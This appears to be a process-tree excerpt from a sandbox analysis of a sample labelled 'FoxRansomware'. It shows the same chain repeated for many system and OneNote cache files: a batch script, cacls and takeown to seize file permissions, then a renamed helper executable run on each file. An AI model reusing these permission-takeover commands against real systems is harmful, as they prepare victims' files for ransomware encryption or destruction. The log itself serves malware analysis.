C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner4⤵PID:5728
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml""2⤵PID:3200
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C3⤵PID:5856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml"3⤵PID:1264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "VdiState.xml" -nobanner3⤵PID:1644
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "VdiState.xml" -nobanner4⤵PID:3336
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""2⤵PID:6064
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C3⤵PID:4544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"3⤵PID:5448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftLync2010.xml" -nobanner3⤵PID:396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftLync2010.xml" -nobanner4⤵PID:2208
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""2⤵PID:5508
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C3⤵PID:6008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"3⤵PID:4592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner3⤵PID:5140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner4⤵PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3516
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""2⤵PID:3908
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C3⤵PID:5932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"3⤵
- Modifies file permissions
PID:6020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner3⤵PID:5280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner4⤵PID:5812
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:4424
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:2588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵PID:5852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:4720
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:3708
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:5216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "device.png" -nobanner3⤵PID:4892
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "device.png" -nobanner4⤵PID:4836
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:1808
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:5260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵PID:5544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵PID:688
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl""2⤵PID:2420
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl" /E /G Admin:F /C3⤵PID:5392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl"3⤵PID:6108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl" -nobanner3⤵PID:5456
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl" -nobanner4⤵PID:5264
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:5416
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:5728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵PID:5516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:308
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵PID:5296
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""2⤵PID:4024
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C3⤵PID:1644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"3⤵PID:3392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner3⤵PID:5992
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner4⤵PID:3200
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""2⤵PID:5208
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C3⤵PID:4032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"3⤵PID:4372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner3⤵PID:5944
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner4⤵PID:5700
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2744
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""2⤵PID:3636
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C3⤵PID:5592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"3⤵PID:5292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "RoamingCredentialSettings.xml" -nobanner3⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "RoamingCredentialSettings.xml" -nobanner4⤵PID:5248
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.93fa158a-00d2-4e8a-b1e6-9c659b0c56eb.1.etl""2⤵PID:4312
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.93fa158a-00d2-4e8a-b1e6-9c659b0c56eb.1.etl" /E /G Admin:F /C3⤵PID:5552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.93fa158a-00d2-4e8a-b1e6-9c659b0c56eb.1.etl"3⤵
- Modifies file permissions
PID:6076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "UpdateSessionOrchestration.93fa158a-00d2-4e8a-b1e6-9c659b0c56eb.1.etl" -nobanner3⤵PID:1300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "UpdateSessionOrchestration.93fa158a-00d2-4e8a-b1e6-9c659b0c56eb.1.etl" -nobanner4⤵PID:3908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.b77ad222-1c60-48c4-ae91-739e789cccc2.1.etl""2⤵PID:3612
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.b77ad222-1c60-48c4-ae91-739e789cccc2.1.etl" /E /G Admin:F /C3⤵PID:224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.b77ad222-1c60-48c4-ae91-739e789cccc2.1.etl"3⤵PID:1004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "UpdateSessionOrchestration.b77ad222-1c60-48c4-ae91-739e789cccc2.1.etl" -nobanner3⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "UpdateSessionOrchestration.b77ad222-1c60-48c4-ae91-739e789cccc2.1.etl" -nobanner4⤵PID:5924
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.5f15a3ee-8d16-4798-919f-3d5187aa6421.1.etl""2⤵PID:820
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.5f15a3ee-8d16-4798-919f-3d5187aa6421.1.etl" /E /G Admin:F /C3⤵PID:1032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.5f15a3ee-8d16-4798-919f-3d5187aa6421.1.etl"3⤵PID:4692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "WuProvider.5f15a3ee-8d16-4798-919f-3d5187aa6421.1.etl" -nobanner3⤵PID:1932
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "WuProvider.5f15a3ee-8d16-4798-919f-3d5187aa6421.1.etl" -nobanner4⤵PID:5084
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:5772
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:5304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Modifies file permissions
PID:4320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "background.png" -nobanner3⤵PID:5976
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "background.png" -nobanner4⤵PID:5156
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:4776
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:5392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵PID:6108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "tasks.xml" -nobanner3⤵PID:5316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "tasks.xml" -nobanner4⤵PID:5456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin""2⤵PID:3656
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" /E /G Admin:F /C3⤵PID:6084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin"3⤵
- Modifies file permissions
PID:5620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000004.bin" -nobanner3⤵PID:5832
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000004.bin" -nobanner4⤵PID:5856
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin""2⤵PID:3068
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" /E /G Admin:F /C3⤵PID:5664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin"3⤵
- Modifies file permissions
PID:3616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000000H.bin" -nobanner3⤵PID:5864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000000H.bin" -nobanner4⤵PID:6132
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3336
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin""2⤵PID:3436
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" /E /G Admin:F /C3⤵PID:3148
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin"3⤵PID:5892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000000S.bin" -nobanner3⤵PID:5700
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000000S.bin" -nobanner4⤵PID:5792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin""2⤵PID:3108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" /E /G Admin:F /C3⤵PID:3572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin"3⤵PID:5492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000016.bin" -nobanner3⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000016.bin" -nobanner4⤵PID:4276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin""2⤵PID:2120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin" /E /G Admin:F /C3⤵PID:2288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin"3⤵PID:5788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000050.bin" -nobanner3⤵PID:4796
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000050.bin" -nobanner4⤵PID:3004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5528
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin""2⤵PID:5852
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin" /E /G Admin:F /C3⤵PID:5640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin"3⤵
- Modifies file permissions
PID:5924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000006S.bin" -nobanner3⤵PID:3804
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000006S.bin" -nobanner4⤵PID:700
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin""2⤵PID:5372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin" /E /G Admin:F /C3⤵PID:5932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin"3⤵PID:5348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000076.bin" -nobanner3⤵PID:1932
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000076.bin" -nobanner4⤵PID:5632
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin""2⤵PID:2332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin" /E /G Admin:F /C3⤵PID:5968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin"3⤵
- Modifies file permissions
PID:6032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000007G.bin" -nobanner3⤵PID:5156
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000007G.bin" -nobanner4⤵PID:2384
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4004
-
-
-
